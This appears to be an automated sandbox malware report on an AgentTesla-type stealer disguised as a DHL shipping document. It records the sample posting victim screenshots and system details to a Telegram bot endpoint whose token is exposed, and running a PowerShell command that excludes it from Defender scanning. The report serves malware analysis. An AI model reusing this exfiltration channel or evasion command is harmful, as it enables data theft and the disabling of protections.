                                              2024-05-23 18:27:39 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 62 34 37 37 38 65 38 37 30 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 62 34 37 37 38 65 38 37 30 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 39 2f 32 32 2f 32 30 32 34 20 32 30 3a 34 35 3a 31 38 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dcdb4778e8706bContent-Disposition: form-data; name="chat_id"7153133538-----------------------------8dcdb4778e8706bContent-Disposition: form-data; name="caption"New SC Recovered!Time: 09/22/2024 20:45:18User
                                              2024-05-23 18:27:39 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:27:39 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:27:39 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:27:39 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:27:39 UTC1358OUTData Raw: b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57 0e a8 b9 39 c2 8c f0 07 6a c8 a2 90 1a 72 eb 97 d3 cf 0c f7 12 79 f3 45 6d 25 b7 99 29 66 66 57 0e 09 24 9e 48 12 1c 7d 05 66 51 45 00 14 51 45 00 15 d7 4d e3 18 ae 63 89 25 b4 78 fc b5 c0 2a c1 b3 fc b1 d2 b9 1a 29 24 b9 d4 fa ad 81 eb 17 1e 8c ec a6 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 3f 59 f1 2a ea 3a 42 e9 c9 6c ca aa e1 c4 8c dc 9c 67 b6 3d fd 6b 9d a2 b3 8d 18 46 2a 09 68 9d fa ee 53 9b 72 e6 eb 6b 05 14 51 5a 92 15 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a c1 a2 a6 51 52 56 64 4e 0a 6a cc f4 cd 37 53 bb b9 6d af 79 b6 04 19 79 0e d0 71 e9 bb af eb 59 5e 2a f1 3c 12 5a bd 85 84 82 43 20 c4 92 2f 40 3d 07 ad 71 14 57 23 c1 a9 d5 55 2a 3b
                                              Data Ascii: \>k()Vgr\W9jryEm%)ffW$H}fQEQEMc%x*)$36b?Y*:Blg=kF*hSrkQZj"X'm+zQRVdNj7SmyyqY^*<ZC /@=qW#U*;
                                              2024-05-23 18:27:39 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 64 62 34 37 37 38 65 38 37 30 36 62 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dcdb4778e8706b--
                                              2024-05-23 18:27:39 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:27:39 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:27:39 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":281,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488859,"document":{"file_name":"user-715575 2024-09-22 20-45-19.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEZZk-Km8pWAwKXYR8PRUHRxN8Smu8AAs8TAALx64FSbusVmqfXBBkBAAdtAAM1BA","file_unique_id":"AQADzxMAAvHrgVJy","file_size":12371,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEZZk-Km8pWAwKXYR8PRUHRxN8Smu8AAs8TAALx64FSbusVmqfXBBkBAAdtAAM1BA","file_unique_id":"AQADzxMAAvHrgVJy","file_size":12371,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBGWZPipvKVgMCl2EfD0VB0cTfEprvAALPEwAC8euBUm7rFZqn1wQZNQQ","file_unique_id":"AgADzxMAAvHrgVI","file_size":66315},"caption":"New SC Recovered!\n\nTime: 09/22/2024 20:45:18\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26192.168.2.749743149.154.167.220443
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:27:50 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dc7b43a2c5ed73
                                              Host: api.telegram.org
                                              Content-Length: 66944
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-05-23 18:27:50 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:27:50 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 34 33 61 32 63 35 65 64 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 34 33 61 32 63 35 65 64 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 35 2f 32 33 2f 32 30 32 34 20 31 36 3a 31 36 3a 30 30 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dc7b43a2c5ed73Content-Disposition: form-data; name="chat_id"7153133538-----------------------------8dc7b43a2c5ed73Content-Disposition: form-data; name="caption"New SC Recovered!Time: 05/23/2024 16:16:00User
                                              2024-05-23 18:27:50 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:27:50 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:27:50 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:27:50 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:27:50 UTC1358OUTData Raw: b7 5c 06 3e a4 f7 fc 6b 0e 8a 28 00 a2 8a 29 80 56 bd cf 89 f5 cb 8b a9 67 fe d5 bc 8b cc 72 fe 5c 57 0e a8 b9 39 c2 8c f0 07 6a c8 a2 90 1a 72 eb 97 d3 cf 0c f7 12 79 f3 45 6d 25 b7 99 29 66 66 57 0e 09 24 9e 48 12 1c 7d 05 66 51 45 00 14 51 45 00 15 d7 4d e3 18 ae 63 89 25 b4 78 fc b5 c0 2a c1 b3 fc b1 d2 b9 1a 29 24 b9 d4 fa ad 81 eb 17 1e 8c ec a6 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 3f 59 f1 2a ea 3a 42 e9 c9 6c ca aa e1 c4 8c dc 9c 67 b6 3d fd 6b 9d a2 b3 8d 18 46 2a 09 68 9d fa ee 53 9b 72 e6 eb 6b 05 14 51 5a 92 15 bd a5 6a c8 22 58 27 6d 8c bc 2b 7a 8a c1 a2 a6 51 52 56 64 4e 0a 6a cc f4 cd 37 53 bb b9 6d af 79 b6 04 19 79 0e d0 71 e9 bb af eb 59 5e 2a f1 3c 12 5a bd 85 84 82 43 20 c4 92 2f 40 3d 07 ad 71 14 57 23 c1 a9 d5 55 2a 3b
                                              Data Ascii: \>k()Vgr\W9jryEm%)ffW$H}fQEQEMc%x*)$36b?Y*:Blg=kF*hSrkQZj"X'm+zQRVdNj7SmyyqY^*<ZC /@=qW#U*;
                                              2024-05-23 18:27:50 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 37 62 34 33 61 32 63 35 65 64 37 33 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dc7b43a2c5ed73--
                                              2024-05-23 18:27:51 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:27:51 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":282,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488871,"document":{"file_name":"user-715575 2024-05-23 16-16-00.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEaZk-KpsLSMbnlWHMVgoara80HExkAAtATAALx64FS32eUGltsa0EBAAdtAAM1BA","file_unique_id":"AQAD0BMAAvHrgVJy","file_size":12371,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEaZk-KpsLSMbnlWHMVgoara80HExkAAtATAALx64FS32eUGltsa0EBAAdtAAM1BA","file_unique_id":"AQAD0BMAAvHrgVJy","file_size":12371,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBGmZPiqbC0jG55VhzFYKGq2vNBxMZAALQEwAC8euBUt9nlBpbbGtBNQQ","file_unique_id":"AgAD0BMAAvHrgVI","file_size":66315},"caption":"New SC Recovered!\n\nTime: 05/23/2024 16:16:00\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:14:23:38
                                              Start date:23/05/2024
                                              Path:C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe"
                                              Imagebase:0x22037b40000
                                              File size:641'545 bytes
                                              MD5 hash:5F73C9853E26A72D00ACB018DB8A9175
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1450167139.00000220398D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:14:23:43
                                              Start date:23/05/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -Force
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:14:23:43
                                              Start date:23/05/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:14:23:43
                                              Start date:23/05/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                              Imagebase:0xfd0000
                                              File size:65'440 bytes
                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3680847328.00000000032A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3680847328.00000000032A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3674535652.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:5
                                              Start time:14:23:43
                                              Start date:23/05/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                              Imagebase:0x2a0000
                                              File size:65'440 bytes
                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:14:23:44
                                              Start date:23/05/2024
                                              Path:C:\Windows\System32\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\WerFault.exe -u -p 3812 -s 1324
                                              Imagebase:0x1d0000
                                              File size:570'736 bytes
                                              MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 00007FFAACDE0261 Relevance: 8.4, Strings: 5, Instructions: 2164COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453977478.00007FFAACDE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDE0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaacde0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: A$3J$3J$3J$3J
                                                • API String ID: 0-2249433194
                                                • Opcode ID: ff0086975c8a655595c30d38b11c2578c3f65105a0abac4dc752838a344fed48
                                                • Instruction ID: acd6db9b73aa4360869b126e347557cb2f38cb1304720049ec777e02280426aa
                                                • Opcode Fuzzy Hash: ff0086975c8a655595c30d38b11c2578c3f65105a0abac4dc752838a344fed48
                                                • Instruction Fuzzy Hash: 37E2F471A0EBC68FE756DB2888555A47FA0EF57300F0945FED09DCB193DB28A84AC781
                                                Function 00007FFAACCD1E12 Relevance: 2.0, Strings: 1, Instructions: 747COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1453425528.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ffaaccd0000_Documents Of DHL -BL- AWB- 8976453410.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: kBM_^
                                                • API String ID: 0-1509302871
